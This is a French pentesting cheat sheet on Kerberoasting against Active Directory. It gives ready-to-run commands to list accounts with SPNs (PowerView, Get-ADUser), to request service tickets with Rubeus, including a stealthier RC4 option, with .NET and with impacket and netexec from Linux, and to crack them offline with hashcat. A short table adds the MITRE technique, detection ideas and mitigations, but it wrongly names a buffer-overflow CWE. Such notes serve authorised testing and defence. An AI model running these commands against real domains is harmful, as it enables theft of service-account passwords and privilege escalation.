Le kerberoasting consiste à cibler les utilisateurs ayant un SPN. De ce fait, il est possible de récupérer un TGS à leur nom et ainsi de tenter de le cracker pour récupérer le password du compte. ![0 GIZONcxOmJC9DyH5](../../../Files/0%20GIZONcxOmJC9DyH5.jpg) --- ### Powershell #### Lister les comptes avec un SPN ```powershell Get-DomainUser -SPN #powerview --- Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #powershell ``` --- ### Avec [[Rubeus]] ```powershell Rubeus.exe kerberoast /stats ``` #### Request un TGS ```powershell Rubeus.exe kerberoast /user:utilisateur /simple ``` #### Request un TGS sans downgrade du chiffrement. Cela permet de ne demander que les SPN avec un chiffrement type RC4_HMAC, ce qui est potentiellement plus stealthy ```powershell Rubeus.exe kerberoast /stats /rc4opsec Rubeus.exe kerberoast /user:utilisateur /simple /rc4opsec ``` --- ### En .net #### Request d'un tgs ```powershell Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "USSvc/serviceaccount" ``` --- ### Depuis linux #### Lister les comptes avec un SPN ```bash netexec ldap -u "user" -p "password" --kerberoasting output.txt --- impacket-GetUserSPNs -dc-ip $ip -u "" -p "" $domain/$user impacket-GetUserSPNs -dc-ip $ip $domain/$user -request -outputfile output.txt ``` ### Cracker le tgs ```bash hashcat -m 13100 '$tgs' /usr/share/wordlist/rockyou.txt ``` ![crack-ticket](../../../Files/crack-ticket.webp) --- | Catégorie | Information | | ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **TTP** | T1208 (Kerberoasting) | | **CWE** | CWE-120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')) | | **Description de l'attaque** | Kerberoasting exploite la fonctionnalité des tickets de service [[Kerberos]] dans les environnements Windows. Les attaquants extraient les tickets de service Kerberos et les craquent hors ligne pour obtenir des mots de passe d'utilisateurs de service faibles. | | **Impacts potentiels** | - Accès non autorisé aux ressources réseau<br>- Compromission de comptes de service<br>- Élévation de privilèges | | **Comment la détecter** | - Surveillance des demandes anormales de tickets de service Kerberos<br>- Analyse des journaux pour les tentatives de connexion échouées fréquentes<br>- Utilisation d'outils de détection d'intrusion | | **Remédiations/mitigations** | - Utiliser des mots de passe forts pour les comptes de service<br>- Appliquer la politique de sécurité Least Privilege<br>- Mettre en œuvre des audits réguliers des comptes et des mots de passe<br>- Utiliser Advanced Threat Protection pour surveiller les activités suspectes | | **Lien de référence** | [MITRE ATT&CK - T1208: Kerberoasting](https://attack.mitre.org/techniques/T1208/) |